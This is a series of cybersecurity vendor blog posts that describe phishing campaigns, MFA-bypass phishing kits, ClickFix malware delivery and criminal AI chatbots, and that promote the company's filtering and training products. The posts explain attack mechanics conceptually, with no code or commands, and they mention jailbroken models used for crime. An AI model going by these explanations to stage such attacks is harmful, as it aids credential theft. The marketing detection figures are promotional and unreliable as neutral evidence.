titanadmin
by titanadmin | Feb 18, 2025 | Phishing & Email Spam |
A growing number of businesses are implementing multi-factor authentication to add an extra layer of security and improve defenses against phishing attacks. While multifactor authentication (MFA) can prevent unauthorized individuals from accessing accounts using compromised credentials, MFA does not provide total protection. Several phishing kits are sold on hacking forums and Telegram that are capable of bypassing MFA, and a new phishing kit has recently been identified that can intercept credentials in real-time and bypass MFA through session hijacking. The phishing kit is being used to steal credentials and access Gmail, Yahoo, AOL, and Microsoft 365 accounts.
The Astaroth phishing kit has been offered on cybercrime forums since at least January 2025. Similar to the Evilginx phishing kit, Astaroth uses a reverse proxy to intercept and manipulate traffic between the victim and the legitimate authentication of the account being targeted. A cybercriminal can use the Astaroth phishing kit in an adversary-in-the-middle attack, capturing not only login credentials but also 2FA tokens and session cookies, thereby bypassing MFA. The credential theft and session hijacking take place in real time, allowing the cybercriminal to instantly access the user’s account.
The user is presented with a phishing link, which is commonly communicated via email. If that link is clicked, the user is directed to a server and is presented with what appears to be a legitimate login page. The page has valid SSL certificates, so no security warnings are generated. The server acts as a reverse proxy, and when the username and password are entered, they are captured and forwarded to the legitimate authentication service in real time.
The cybercriminal is alerted about the credential capture via the admin panel of the phishing kit or via Telegram, and the one-time passcodes, usually generated via SMS, push notifications, or authentication apps, are intercepted as they are entered by the user. When session cookies are generated, they are immediately hijacked and injected into the attacker’s browser, which means the attacker can impersonate the genuine user without needing their username, password, or 2FA token, since the session has already been authenticated. The kit also includes bulletproof hosting and reCAPTCHA bypasses and allows the attacker to access the account immediately before the user suspects anything untoward has happened.
Phishing kits such as Astaroth are able to render multifactor authentication useless, demonstrating why it is so important to have effective anti-spam software, capable of identifying and blocking the initial phishing emails. SpamTitan is frequently rated as the best spam filter for business due to its ease of implementation and use, exceptional detection, and low false positive rate. TitanHQ also offers MSP spam filtering, with the solution developed from the ground up to meet all MSP needs. In recent independent tests by VirusBulletin, SpamTitan outperformed all other tested email security solutions, achieving the highest overall score thanks to a 100% malware catch rate, 100% phishing catch rate, 99.999% spam catch rate, and a 0.000% false positive rate. The exceptional performance is due to extensive threat intelligence feeds, machine learning to identify phishing attempts, and email sandboxing to detect and block malware and zero-day threats.
In addition to an advanced spam filtering service, businesses should ensure they provide regular security awareness training to the workforce and reinforce training with phishing simulations. SafeTitan from TitanHQ is an easy-to-use security awareness training platform that makes it easy to create effective training courses and automate the delivery of training content. The platform also includes a phishing simulator with an extensive library of phishing templates that makes it easy to create and automate phishing simulations, generating relevant training automatically if a user is tricked. That means training is delivered at the point when it is likely to be most effective at correcting behavior.
Give the TitanHQ team a call today for more information about these solutions. TitanHQ’s SpamTitan and SafeTitan products, like all TitanHQ solutions, are also available on a free trial.
by titanadmin | Feb 14, 2025 | Phishing & Email Spam |
Security awareness training programs teach employees to be constantly alert to potential phishing emails, especially emails with file attachments. Most employees will be aware that Office documents can contain macros, which if allowed to run, can download malware onto their device, but they are likely much less suspicious about image files. Image files are far less likely to be malicious; however, there is an image file format that can contain malicious content – SVG files – and they are increasingly being used in phishing campaigns.
An SVG or Scalable Vector Graphics file is XML-based, which means it can be scaled without loss of quality. These file types are commonly used for icons and buttons and are extensively used in graphic design, including for company logos. Image files may seem pretty innocuous, but one of the properties of SVG files, unlike non-scalable image formats such as Jpegs, is they can be created to include scripts, anchor tags, and other types of active web content. When opening an SVG file, unless a computer has been configured to open the file using a specific image program, the file will be opened in a web browser.
One campaign incorporated the SharePoint logo and advised the user that a secure document has been shared through Microsoft SharePoint. The image included a folder icon with the file name “Updated Compensation and Benefits”, and an “open” button that the user is encouraged to click. Clicking that button directs the user to a phishing page where they must enter their credentials to view the file. Those credentials will be captured and used to access the user’s account. Many phishing campaigns that use SVG file attachments include hyperlinks that direct the user to a site that spoofs a well-known brand such as Microsoft to harvest credentials, such as displaying a fake Microsoft 365 login page. These phishing pages have been designed to be indistinguishable from the genuine login prompt and may even autofill the user’s login name into the login prompt.
There are two main advantages to using SVG files in phishing campaigns. First and foremost, the file is less likely to be flagged as malicious by an email security solution, many of which do not analyze the content of SVG files, therefore ensuring messages containing SVG files are delivered to an end user’s inbox. Secondly, since awareness of malicious SVG files is low, the targeted individuals may be easily tricked into clicking on the hyperlink. The use of SVG files in phishing campaigns is becoming more common, and this trend is likely to continue in 2025. Businesses should ensure that they have adequate defenses to block these attacks, which should consist of advanced anti-spam software to block these phishing emails, and security awareness training content should be updated to raise awareness of this attack technique.
SpamTitan is an advanced spam filtering service from TitanHQ that has been proven to block more phishing emails than other email security solutions. SpamTitan was recently put to the test by VirusBulletin and outperformed all other tested anti-spam software solutions, blocking 100% of malware, 100% of phishing emails, and 99.999% of spam emails, with a 0.000% false positive rate. Machine learning algorithms ensure that the solution gets better over time, extensive threat intelligence feeds keep the solution automatically updated with up-to-the-minute threat intelligence, and a next-generation email sandbox provides exceptional protection against malware. When coupled with the SafeTitan security awareness training and phishing simulations to improve employee awareness, businesses will be well protected against phishing, malware, and other email-based attacks. Give the TitanHQ team a call today for more information about these solutions or take advantage of a free trial and see for yourself the difference these solutions make to your security posture.
by titanadmin | Feb 3, 2025 | Phishing & Email Spam, Security Awareness, Spam Software |
Investigations of cyberattacks have identified an increasing number of incidents that started with email bombing. A high percentage of cyberattacks involve phishing, where emails are sent to employees to trick them into visiting a malicious website and disclosing their credentials, or opening a malicious file that installs malware. Email bombing is now being used to increase the effectiveness of phishing campaigns.
With email bombing, the user is sent a large number of spam emails in a short period of time, such as by adding a user to a large number of mailshots, news services, and spam lists. The threat actor creates a genuine spam issue then impersonates a member of the IT department and claims they can fix the problem, with content often made via a Microsoft Teams message. If the user accepts, they are tricked into installing remote access software and granting the threat actor remote access to their device. The threat actor will establish persistent access to the user’s device during the remote access session. What starts with an email bombing attack often ends with a ransomware attack.
There are several measures that you should consider implementing to prevent these attacks. If you use Microsoft Teams, consider restricting calls and messages from external organizations, unless there is a legitimate need to accept such requests. If so, ensure permission is only given to trusted individuals such as business partners. The use of remote access tools should be restricted to authorized personnel only, and steps should be taken to prevent the installation of these tools, including using a web filter to block downloads of these tools (and other executables) from the Internet.
An spam filter should be implemented to block spam and unwanted messages. Advanced spam filters such as SpamTitan use AI-guided detection and machine learning to block spam, phishing, and other malicious emails, along with email sandboxing to identify novel threats and zero-day malware. In the Q4, 2024, tests at VirusBulletin, the SpamTitan spam filtering service blocked 99.999% of spam emails, 100% of phishing emails, and 100% of malware with a 0.000% false positive rate, earning SpamTitan top position out of all anti-spam software under test.
Businesses should not underestimate the importance of security awareness training and phishing simulations. Regular security awareness training should be provided to all members of the workforce to raise awareness of the tactics used by cybercriminals. A cyberattack is much more likely to occur as a result of a phishing or social engineering attempt than the exploitation of a software vulnerability. Businesses that use the SafeTitan security awareness training platform and phishing simulator have reduced susceptibility to email attacks by up to 80%. For more information on TitanHQ cybersecurity solutions, including award-winning anti-spam solutions for managed service providers, give the TitanHQ team a call or take advantage of a free trial of any of TitanHQ’s cybersecurity solutions.
by titanadmin | Jan 31, 2025 | Phishing & Email Spam, Security Awareness, Spam News |
As the massive cyberattack on Change Healthcare demonstrated last year, the failure to implement multifactor authentication on accounts can be costly. In that attack, multifactor authentication was not implemented on a Citrix server, and stolen credentials allowed access that resulted in the theft of the personal and health information of 190 million individuals. The ransomware attack caused a prolonged outage and remediation and recovery cost Change Healthcare an estimated $2.9 billion last year.
The attack should serve as a warning for all companies that multifactor authentication is an essential cybersecurity measure – If passwords are compromised, access to accounts can be prevented. Unfortunately, multifactor authentication protection can be circumvented. Threat actors are increasingly using phishing kits capable of intercepting multifactor authentication codes in an adversary-in-the-middle attack. Phishing kits are packages offered to cybercriminals that cover all aspects of phishing. If purchased, phishing campaigns can be conducted with minimal effort as the phishing kit will generate copies of websites that impersonate well-known brands, the infrastructure for capturing credentials, and templates for phishing emails. After paying a fee, all that is required is to supply the email addresses for the campaign, which can be easily purchased on hacking forums.
Some of the more advanced phishing kits are capable of defeating multifactor authentication by harvesting Microsoft 365 and Gmail session cookies, which are used to circumvent MFA access controls during subsequent authentication. One of the latest phishing kits to be identified is has been dubbed Sneaky 2FA. The kit was first identified as being offered and operated on Telegram in October 2024 by researchers at the French cybersecurity firm Sekoia. The researchers identified almost 100 domains that host phishing pages created by the Sneaky 2FA phishing kit.
As with a standard phishing attack, phishing emails are sent to individuals to trick them into visiting a phishing page. One campaign using the Sneaky 2FA phishing kit uses payment receipt-related emails to trick the recipient into opening a PDF file attachment that has a QR code directing the user to a Sneaky 2FA page on a compromised website, usually a compromised WordPress site. These pages have a blurred background and a login prompt. Microsoft 365 credentials are required to access the blurred content. The phishing pages automatically add the user’s email address to the login prompt, so they are only required to enter their password. To evade detection, multiple measures are employed such as traffic filtering, Cloudfire Turnstile challenges, and CAPTCHA checks.
Many phishing kits use reverse proxies for handling requests; however, the Sneaky 2FA phishing server handles communications with Microsoft 365 API directly. If the checks are passed, JavaScript code is used to handle the authentication steps. When the password is entered, the user is directed to the next page, and the victim’s email address and password are sent to the phishing server via an HTTP Post. The server responds with the 2FA method for the victim’s account and the response is sent to the phishing server. The phishing kit allows session cookies to be harvested that provide account access, regardless of the 2FA method – Microsoft Authenticator, one-time password code, or SMS verification.
Phishing kits such as Sneaky FA make it easy for cybercriminals to conduct phishing attacks and defeat MFA; however, they are not effective at defeating phishing-resistant MFA such as FIDO2, WebAuthn, or biometric authentication. The problem is that these forms of MFA can be expensive and difficult to deploy at scale.
Businesses can greatly improve their defenses with advanced spam filter software with AI- and machine learning detection, email sandboxing, URL rewriting, QR code checks, greylisting, SPF, DKIM, and DMARC checks, and banners identifying emails from external sources. Effective email filtering will ensure that these malicious emails do not land in employee inboxes. TitanHQ offers two email security solutions – SpamTitan email security and the PhishTitan anti-phishing solution for M365. The engine that powers both solutions was recently rated in 1st place for protection in the Q4, 2024 tests by VirusBulletin, achieving a 100% malware and 100% phishing detection rate.
Regular security awareness training should also be provided to all members of the workforce to raise awareness of threats and to teach cybersecurity best practices. With the SafeTitan security awareness training platform it is easy to create and automate training courses and add in new training content when new threat actor tactics are identified. The platform also includes a phishing simulator for reinforcing training and identifying individuals in need of additional training.
For more information on improving your defenses against phishing and malware, give the TitanHQ team a call. Product demonstrations can be arranged on request and all TitanHQ solutions are available on a free trial.
by titanadmin | Jan 28, 2025 | Phishing & Email Spam, Security Awareness, Spam Software, Website Filtering |
A new malware variant called PLAYFULGHOST has been discovered that is being distributed via phishing emails and websites that appear high in search engine listings through black hat search engine optimation (SEO) tactics.
PLAYFULGHOST was analyzed by Google’s Mandiant Managed Defense team, which confirmed the malware had extensive information-stealing capabilities. They include keylogging, taking screenshots, recording audio, copying information from the clipboard, stealing QQ account information, and collecting information on the installed security solutions and system metadata. The malware can also block mouse and keyboard inputs, clear Windows event logs, delete caches and profiles from web browsers, erase profiles and delete local storage for messaging apps, and the malware has file transfer capabilities and can download additional payloads. The malware achieves persistence in four ways –registry keys, scheduled tasks, establishing itself in a Windows service, and through entries in the Windows Startup folder. In short, PLAYFULGHOST is a highly capable and very dangerous new malware variant.
An analysis of the distribution methods identified SEO poisoning, where websites are promoted so they appear high in the search engine listings for search terms related to Virtual Private Network solutions, including the legitimate LetsVPN solution. If a user visits the webpage, they can download the LetsVPN installer; however, it has been trojanized to silently load PLAYFULGHOST in the memory via an interim payload. Phishing is also used to distribute the malware. While multiple lures could be used in this campaign, intercepted emails had code-of-conduct-related lures to trick the recipient into opening a malicious RAR archive that includes a Windows executable file that downloads and executes the malware from a remote server.
If infected with the malware, detection can be problematic since the malware runs in the memory, and multiple persistence mechanisms can make malware removal challenging. It is vital that infection is prevented and that requires multiple measures since the malware is distributed in different ways. To protect against malware delivery via SEO poisoning and malvertising, businesses should use a web filter and provide regular security awareness training to the workforce. The WebTitan DNS filter is a web filtering solution that protects against web-delivered malware in a variety of ways. WebTitan is fed extensive up-to-the-minute threat intelligence on malicious websites and domains and will prevent users (on and off the network) from visiting those malicious websites. That includes visits to websites through web browsing and redirects through malvertising.
WebTitan can be configured to block certain downloads from the Internet by file extension, such as installers and other executable files. In addition to preventing malware delivery, this feature can be used to control shadow IT – software installations that have not been authorized by the IT department. WebTitan can also be used to control the web content that employees can access, by blocking access to web content that serves no work purpose along with risky categories of websites.
Security awareness training is vital for making employees aware of the risks of malware downloads from the Internet. Employees should be instructed not to download software from unofficial websites, warned of the risks of malvertising, and told not to trust a website simply because it is positioned high in the search engine listings. Employees should also be warned of the risk of phishing, be taught how to identify a phishing attempt, and be conditioned to report suspicious emails to their security team. A phishing simulator should also be used to reinforce training and identify individuals who are susceptible to phishing so they can be provided with additional training. TitanHQ’s SafeTitan security awareness training and phishing simulation platform makes this as easy as possible, automating the delivery of training and phishing simulation exercises.
TitanHQ offers two powerful anti-phishing solutions – PhishTitan for Microsoft 365 users and SpamTitan anti-spam software. Both are powered by the same advanced engine that was recently assessed by VirusBulletin, and confirmed to block 100% of malware, 100% of phishing emails, and 99.999% of spam emails in Q4 tests. The incredibly strong performance earned TitanHQ top spot out of all the leading solutions under test. The strong anti-malware performance was due to twin (signature-based) antivirus engines and cutting-edge behavioral protection with email sandboxing.
With new, stealthy malware variants constantly being released, and cybercriminals developing highly sophisticated AI-based phishing campaigns, businesses need to ensure they have cybersecurity solutions capable of identifying and blocking the threats. With TitanHQ as your cybersecurity partner, you will be well protected against ever-evolving cyber threats. Give the TitanHQ team a call today for further information on bolstering your malware and phishing defenses or put these solutions to the test in a free trial.
by titanadmin | Jan 28, 2025 | Phishing & Email Spam |
In the United States, tax returns for the previous year need to be filed before Tax Day, which falls on Tuesday, April 15, 2025. Tax season officially started on January 27, 2025, when the Internal Revenue Service (IRS) started accepting tax returns for 2024. Tax season is a popular time for cybercriminals who take advantage of individuals and businesses that are under pressure to file their annual tax returns and try to steal personal information to file fraudulent tax returns in victims’ names and for other nefarious purposes.
Cybercriminals use tried and tested methods for their scams, but over the past few years, the scams have become more sophisticated. There has been a significant increase in the use of AI tools to craft highly convincing phishing emails. Phishing is one of the most common ways that cybercriminals trick people into disclosing sensitive information during tax season. One of the most common phishing techniques in tax season involves impersonation of the IRS. Emails are sent that appear to have come from an official IRS domain, the contact information in the email may be 100% correct, and the emails contain the IRS logo. The lures used in these scams include fake offers of tax refunds with rapid payment, legal threats, and criminal charges for tax fraud. These scams tempt or scare people into visiting a website linked in the email or calling a telephone number provided in the email.
The website to which the user is directed mimics the official IRS site and social engineering techniques are used to get the user to disclose sensitive information. That information is rapidly used to file a fraudulent tax return, with the victim only discovering they have been scammed when they file their tax return and are notified by the IRS that it is a duplicate. Alternatively, they are told that they must pay outstanding tax immediately and are threatened with fines and criminal charges if they fail to do so. Scams promising a tax return require personal information and bank account details to be disclosed.
Businesses are targeted in a variety of tax season scams, with one of the most common being fake tax services. Filing tax returns can be a time-consuming and arduous process, so tax filing services that do all of the work are an attractive choice. Businesses may be contacted via email, telephone, or could be directed to these scam services via the Internet. Businesses are tricked into providing personal and financial information, which could be used to file a fraudulent tax return. Commonly, the aim is to trick the business into downloading malware onto their device. These services may lure victims by promising quick tax refunds, which can be attractive for cash-strapped businesses.
According to the IRS, last year taxpayers lost $5.5 billion to tax scams and fraud so vigilance is key during tax season. Be aware that cybercriminals are incredibly active during tax season, and any offer that seems too good to be true most likely is. The IRS will not initiate contact via email or text message, as initial contact is typically made via the U.S. Postal Service, and emails and text messages are only sent if the IRS has been given permission to do so. The IRS will not make contact via social media, does not accept gift cards as payment, does not use robocalls, and does not threaten to call law enforcement or immigration officials.
Businesses should ensure they have anti-spam software to catch and neutralize phishing threats; however, not all spam filtering services are equal. Spam filters will perform a range of checks on inbound email, including reputation checks of the sender’s domain and email address, anti-spoofing checks, checks of blacklists of malicious IP addresses, and the email content will be assessed for malicious links, common signatures of phishing, and email attachments will be checked using anti-virus software. While these methods will identify the vast majority of spam emails and many phishing attempts, these checks are no longer sufficient.
The best spam filter for business is an advanced solution that has AI and machine learning capabilities for detecting advanced phishing scams and AI-generated threats. To catch and block AI-generated threats you need AI in your defenses. SpamTitan is an advanced cloud-based anti-spam service from TitanHQ (an anti-spam gateway is also available) that performs all of the standard checks mentioned above, scans emails with twin anti-virus engines, and uses machine-learning-based detection to identify the threats that many other spam filtering software solutions miss. If initial checks are passed, emails are sent to an email sandbox for deep analysis. With email sandboxing, attachments are assessed in a safe environment and their behavior is analyzed in depth, allowing novel malware to be identified and links are followed and assessed for malicious content.
SpamTitan consistently outperforms other leading email security solutions and, in the latest round of independent tests at VirusBulletin, SpamTitan was ranked in first place due to unbeatable detection rates, having blocked 100% of malware, 100% of phishing emails, and 99.999% of spam emails, with a 0.000% false positive rate. This tax season, ensure you have the best email protection for your business by using SpamTitan. Call TitanHQ for more information, to arrange a product demonstration, or sign up for a free trial to see for yourself how effective SpamTitan is at blocking email threats.
by titanadmin | Jan 26, 2025 | Phishing & Email Spam |
Cybercriminals often devise phishing lures that can be used on as many individuals as possible, which is why they often impersonate big-name brands such as Microsoft, Apple, Facebook, and Google, since there is a high percentage chance that the emails will land in the inbox of someone that uses the products of those companies.
In the case of Google, a phishing campaign targeting Gmail account holders makes sense from the perspective of a cybercriminal as there are around 2.5 billion Gmail users worldwide. One such campaign has recently been identified that uses a combination of an email and a phone call to obtain account credentials. Email accounts can contain a wealth of sensitive information that can be misused or used in further attacks on an individual, and the accounts can be used for phishing and spear phishing campaigns.
Phishing campaigns that combine multiple communication methods are becoming more common, such as callback phishing. With callback phishing, the scam starts with an email devoid of malicious links, scripts, and attachments. The recipient is told that a charge will be applied to their account for a subscription or free trial that is coming to an end. The user is informed that they must call the number in the email to terminate the subscription before the charge is applied. If the number is called, the threat actor uses social engineering techniques to trick the user into downloading a remote access solution to remove the software and prevent the charge. The software gives the threat actor full control of their device.
The latest campaign uses emails and phone calls in the opposite order, with initial contact made via the phone by a person impersonating the Google support team. The reason for the phone call is to advise the Gmail user that their account has been compromised or suspended due to suspicious activity, or that attempts are being made to recover access.
One user received a call where a Google customer support worker told them that a family member was trying to gain access to their account and had provided a death certificate. The call was to verify the validity of the family member’s claim. People targeted in this campaign may attempt to verify the validity of the call by checking the phone number; however, Caller ID is spoofed to make it appear that the call has come from a legitimate Google customer support number.
The second phase of the scam includes an email sent to the user’s Gmail account corroborating the matter discussed in the phone call, with the email requiring action to recover the account and reset the password. A link is provided that directs the user to a spoofed login page where they are required to enter their credentials, which are captured by the scammer. There have also been reports where initial contact is made via email, with a follow-up telephone call.
Performing such a scam at scale would require a great deal of manpower, and while telephone scams are commonly conducted by call center staff in foreign countries, this scam involves AI-generated calls. The caller sounds professional and polite and has a native accent, but the victim is not conversing with a real person. The reason for the call is plausible, the voice very realistic, and the scam is capable of fooling even security-conscious individuals.
Businesses looking to improve their defenses against advanced phishing scams should ensure that they cover these types of sophisticated phishing attempts in their security awareness training programs. Employees should be told that threat actors may use a variety of methods for contact, often combining more than one communication method in the same scam. Keeping employees up to date on the latest tactics used by scammers is straightforward with the SafeTitan security awareness training platform. New training content can easily be created in response to changing tactics to keep the workforce up to date on the latest scams. SafeTitan also includes a phishing simulator for reinforcing training.
An advanced email security solution is also strongly recommended for blocking the email-based component of these sophisticated phishing scams. SpamTitan cloud based anti spam software incorporates machine learning capable of identifying previous unseen phishing scams, ensuring phishing attempts are blocked and do not land in inboxes. In recent independent tests at VirusBulletin, SpamTitan achieved the top spot due to comprehensive detection rates, blocking 100% of malware and phishing emails, and 99.999% of spam emails. To block sophisticated AI-generated phishing attempts you need sophisticated AI-based defenses. Give the TitanHQ team a call today to find out more about improving your defenses against AI-based attacks.
by titanadmin | Jan 26, 2025 | Internet Security, Phishing & Email Spam, Spam Software |
Cybercriminals are increasingly conducting a type of social engineering technique dubbed ClickFix to gain persistent access to victims’ networks. ClickFix attacks involve social engineering to trick the victim into installing malware. ClickFix attacks were first identified in early 2024, and the use of this tactic has been increasing. These attacks take advantage of users’ desire to quickly resolve IT issues without having to inform their IT department. Resolving issues can take time, and usually involves raising a support ticket with the IT department. In ClickFix attacks, the threat actor warns the user about a fake IT issue, often providing some evidence of that issue, and offers a quick and easy solution.
The aim of these attacks is to trick the user into running a PowerShell command, which will ultimately deliver malware to their device. Campaigns have been conducted by threat actors distributing the Lumma information stealer, the Danabot banking trojan/information stealer, the AsyncRAT remote action trojan, and the DarkGate loader, although any number of malware variants could be delivered using this technique. Multiple threat groups have been observed using this technique.
The methods used to get the user to run the malicious PowerShell command are varied, with the deception occurring via email, the Internet, or a combination of the two. Threat actors have been observed conducting phishing ClickFix attacks involving emails with HTML attachments disguised as Microsoft Word documents. The attachments display a fake error message, the resolution of which requires copying and executing a malicious PowerShell command.
Malicious links have been distributed in phishing emails that direct users to sites impersonating software solutions such as Google Meet and PDFSimpli, the Chrome web browser, social media platforms such as Facebook, and transport and logistics companies. Threat actors also use stolen credentials to compromise websites where they create pop-ups, which appear when visitors land on the site warning them about a fictitious security issue. Fake CAPTCHA prompts are often used, where the user is told they must verify that they are human before being allowed to proceed. As part of the verification process, a command is copied to the clipboard, and the user is told to press the Windows key + R, then CTRL + V, and then enter, thus executing the script and triggering a malware download. Security researchers have identified multiple threat actors using this technique, including Russian espionage actors in targeted attacks on Ukrainian companies and many different financially motivated cybercriminal groups.
To defend against Clickfix attacks, businesses need to implement multiple mitigations to prevent these attacks from succeeding, the most important of which are security awareness training, an advanced spam filter, and a web filtering solution. Regular security awareness training should be conducted to improve understanding of the phishing and social engineering techniques used by threat actors, including specific training content to teach employees how to identify and avoid clickfix attacks. TitanHQ offers a comprehensive training platform called SafeTitan that allows businesses to easily create security awareness training programs tailored to individuals and user groups, and rapidly roll out additional training material when a new threat is identified. SafeTitan also includes a phishing simulator to test employee responses to simulated clickfix attacks.
An advanced spam filter is essential for blocking malicious emails. TitanHQ’s SpamTitan suite of solutions includes a spam filter for Office 365, a gateway spam filter, and the most popular choice, a cloud based anti spam service. SpamTitan conducts an extensive array of tests to identify spam and malicious emails, including reputation checks, checks of embedded hyperlinks, email sandbox behavioral analysis, and AI/machine learning to identify the threats that bypass many email security solutions. In recent tests, SpamTitan outperformed all other tested email security solutions with a 100% malware and phishing catch rate, and a 99.999% spam catch rate.
Web filtering solutions should be used to protect against the web-based component of clickfix attacks since initial contact is not always made via email. The WebTitan DNS filter prevents access to known malicious websites, such as the attacker-controlled webpages used in clickfix attacks. WebTitan can also prevent downloads of certain file extensions from the Internet and can also be used to control the categories of websites that employees can visit.
With regular security awareness training, email security, and web security delivered through SafeTitan SpamTitan, and WebTitan, businesses will be well protected from Clickfix attacks. Call TitanHQ today to find out more or take advantage of a free trial of these solutions.
by titanadmin | Jan 25, 2025 | Phishing & Email Spam, Security Awareness, Spam Software |
A new AI chatbot has been released specifically for use by cybercriminals that has been developed to assist with malware development, phishing campaigns, and business email compromise attacks. The new chatbot is called GhostGPT, and follows the release of WormGPT, WolfGPT, and EscapeGPT which are also aimed at cybercriminals and lack the restrictions of ChatGPT and other publicly available chatbots which will not generate responses to queries related to criminality. GhostGPT is thought to connect to a jailbroken open-source large language model (LLM), ensuring queries are not subject to censorship. The tool is offered on Telegram and for a fee, the tool can be immediately used.
There is growing evidence that cybercriminals are using AI tools for malware development, phishing/spear phishing, and business email compromise and there is considerable interest in these tools in the cybercriminal community. These tools can open up new types of attacks to low-skilled cybercriminals, as well as help skilled cybercriminals conduct attacks at an accelerated rate and bypass security solutions. These tools can be used to write malware code with extensive capabilities, dramatically reducing the time required for malware development. Phishing emails can be crafted in multiple languages with perfect grammar and spelling. AI tools are being used to slash the time taken to research individuals for spear phishing and BEC attacks and can even generate emails likely to be of interest to recipients. A recent study demonstrated that humans are not good at identifying AI-generated phishing emails. The researchers found their AI-generated emails had a 54% click rate.
These tools allow rapid development of malware from scratch and cybercriminals can easily spin up multiple malware versions capable of defeating signature-based detection. Phishing and BEC emails can easily fool targeted individuals as they lack the common signs of malicious emails that employees are taught to look for and the level of personalization of emails can be increased with little effort, making it easy for cybercriminals to scale up their spear phishing and BEC campaigns.
Malicious use of LLMs is a genuine cause for concern. Businesses need to respond to these fast-evolving threats by improving their cybersecurity defenses. Since these attacks are predominantly conducted via email, robust email defenses are a must. To defeat AI-generated phishing emails, businesses need to ensure they incorporate AI in their defenses and email security solutions need more than signature-based detection to identify and block malware.
SpamTitan, TitanHQ’s spam filtering service, incorporates AI and machine learning algorithms to identify the malicious AI-generated emails that many spam filtering solutions fail to block. SpamTitan also includes a next-generation email sandbox, where emails are sent for extensive analysis to identify threats from their behavior rather than their signature. In the Q4, 2024, tests by VirusBulletin, the engine that powers SpamTitan and TitanHQ’s Microsoft 365 anti-phishing solution – PhishTitan – ranked first for overall score, outperforming all other leading email filtering solutions under test. TitanHQ achieved a 100% malware catch rate, 100% phishing catch rate, and 99.999% spam catch rate, with a 0.000% false positive rate.
The high percentage of individuals fooled by ai-generated phishing emails highlights the importance of conducting regular security awareness training. Employees must be kept aware of the latest threats and tactics used by cybercriminals, and training should be reinforced with phishing simulations. Phishing simulations have been proven to make training more effective and highlight the individuals who are failing to apply their training to the emails they receive on a daily basis. The SafeTitan security awareness training platform and phishing simulator make it easy to spin up training courses, keep employees up to date on the current threat landscape, and automate phishing simulations.
Speak with the TitanHQ team today to discuss your options for improving your defenses against phishing and malware. TItanHS’s solutions are available on a free trial and product demonstrations can be arranged on request.
by titanadmin | Jan 20, 2025 | Phishing & Email Spam |
New phishing schemes are constantly developed by threat actors to trick people into disclosing sensitive information or downloading malicious files that provide the attacker with remote access to their devices. This month, two campaigns have been identified that use PDF files to hide the phishing content from email security solutions, one of which uses a lure of expired Amazon Prime memberships, and the other impersonates the US Postal Service and advises the recipient about a failed delivery.
Amazon Prime Phishing Campaign
The emails in this phishing campaign appear to have been sent by Amazon Prime and include a PDF file attachment. The PDF file advises the recipient that their membership is due to expire on a specified date; however, the card Amazon has on file is no longer valid. In order to continue with the membership, new card details must be supplied; however, attempts will first be made to charge the membership to all other cards on the account. Users are warned that if payment is not made, the account will be suspended.
Due to the huge number of Amazon Prime members, the emails have a good chance of landing in the inbox of an Amazon Prime subscriber; however, anyone who has previously had an Amazon Prime membership may be tricked into following the link in the PDF to ensure that the cards on file will not be charged.
If the link is clicked, the user is directed to a URL (a duckdns.org subdomain) that displays an exact copy of the Amazon sign-in page. If they attempt to log in, they are asked to secure their account by confirming their identity and are told to sign out of all web apps, devices, and web browsers. The “Verify Your Identity” page asks for their full name, date of birth, Social Security number, phone number, and full address. They are then taken to a page where they are asked to enter their payment card information. In addition to fraudulent charges to their card, the theft of personal information puts victims at risk of identity theft.
US Postal Service Phishing Campaign
A large-scale phishing campaign is being conducted impersonating the US Postal Service that similarly uses malicious PDFs. This campaign specifically targets mobile devices with the aim of harvesting personal information. More than 630 phishing pages have been identified as part of this campaign targeting individuals in more than 50 countries. The PDF files use a novel technique for hiding the phishing URL from email security solutions, making it harder to identify and extract the URL for analysis.
Text messages are sent that advise the recipient that a package has arrived at a USPS distribution center; however, the package cannot be delivered due to incomplete address information. A link is included to a web-hosted PDF file that the recipient is told they must click to complete the address information. The link directs the user to a phishing page, where they must enter their full address, email address, and contact telephone number into the form. They are then asked to pay a small service charge for redelivery – $0.30 – and must submit their card details.
Improve Your Phishing Defenses
These are just two examples of new phishing campaigns that use PDF files to hide phishing links from email security solutions. PDF files are commonly used for this purpose as they can contain clickable links, scripts, and even malicious payloads. What makes the attacks even more effective is when they target mobile devices, which have smaller screens that make it harder to view the URL, thus making it easier to hide a domain unrelated to the company being impersonated. Mobile devices also tend to have weaker security than desktop computers and laptops.
Businesses should ensure they conduct regular security awareness training to teach cybersecurity best practices, warn employees about cyber threats, and teach the skills needed to identify phishing and social engineering attempts. Training should be an ongoing process and should include the latest scams and new techniques used by cybercriminals to target employees, especially campaigns targeting mobile devices as malicious text messages are harder to block than malicious emails. An advanced email security solution should be implemented that has AI and machine learning capabilities, and email sandboxing to analyze emails and attachments in-depth to identify malware, malicious scripts, and embedded hyperlinks.
TitanHQ can help in both of these areas. SafeTitan is a comprehensive security awareness training platform that makes it easy to create and automate security awareness training for the workforce. The platform includes a phishing simulator for conducting internal phishing campaigns to reinforce training and identify individuals who are susceptible to phishing attempts.
TitanHQ’s cloud-based anti-spam service – SpamTitan is an advanced email security solution for blocking the full range of email threats including phishing, spear phishing, business email compromise, and malware. In independent tests, SpamTitan achieved 1st spot for detection, blocking 100% of phishing attempts, 100% of malware, and 99.999% of spam emails, with a 0.000% false positive rate.
For more information on cloud-based email filtering and attachment and message sandboxing with SpamTitan and security awareness training and phishing simulations with SafeTitan, give the TitanHQ team a call. All TitanHQ solutions are available on a free trial, and MSP-focused solutions are available to easily add advanced anti-phishing and security awareness training to service stacks.
by titanadmin | Jan 15, 2025 | Phishing & Email Spam |
Large language models (LLMs) are used for natural language processing tasks and can generate human-like responses after being trained on vast amounts of data. The most capable LLMs are generative pretrained transformers, or GPTs, the most popular of which is ChatGPT, although there are many others including the China-developed DeepSeek app.
These AI-powered tools have proven incredibly popular and are used for a wide range of tasks, eliminating a great deal of human effort. They are used for creating articles, resumes, job applications, and completing homework, translating from one language to another, creating summaries of text to pull out the key points, and writing and debugging code to name just a few applications.
When these artificial intelligence tools were released for public use, security professionals warned that in addition to the beneficial uses, they could easily be adopted by cybercriminals for malicious purposes such as writing malware code, phishing/spearphishing, and social engineering.
Guardrails were implemented by the developers of these tools to prevent them from being used for malicious purposes, but those controls can be circumvented. Further, LLMs have been made available specifically for use by cybercriminals that lack the restrictions of tools such as ChatGPT and DeepSeek.
Evidence has been growing that cybercriminals are actively using LLMs for malicious purposes, including writing flawless phishing emails in multiple languages. Human-written phishing emails often contain spelling mistakes and grammatical errors, making them relatively easy for people to identify but AI-generated phishing emails lack these easily identified red flags.
